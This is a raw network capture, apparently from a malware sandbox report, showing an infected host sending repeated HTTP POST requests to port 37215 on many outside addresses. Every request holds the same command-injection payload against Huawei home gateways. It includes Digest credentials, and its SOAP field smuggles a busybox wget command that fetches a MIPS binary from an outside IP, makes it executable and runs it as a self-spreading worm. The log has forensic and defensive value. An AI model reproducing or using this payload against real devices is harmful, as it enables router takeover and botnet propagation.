                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1192192.168.2.2354348143.202.114.1737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.317249060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1193192.168.2.2352314197.198.227.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.317269087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1194192.168.2.2352262204.58.107.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.317269087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1195192.168.2.234268241.99.140.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.318820000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1196192.168.2.2356300157.213.74.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.318837881 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1197192.168.2.2338870157.233.102.12737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.318897963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1198192.168.2.2352766207.218.152.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.319101095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1199192.168.2.2344260197.129.87.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.319116116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1200192.168.2.2360136202.47.32.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.319129944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1201192.168.2.234435637.218.90.23637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.319148064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1202192.168.2.2359774157.189.88.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.324875116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
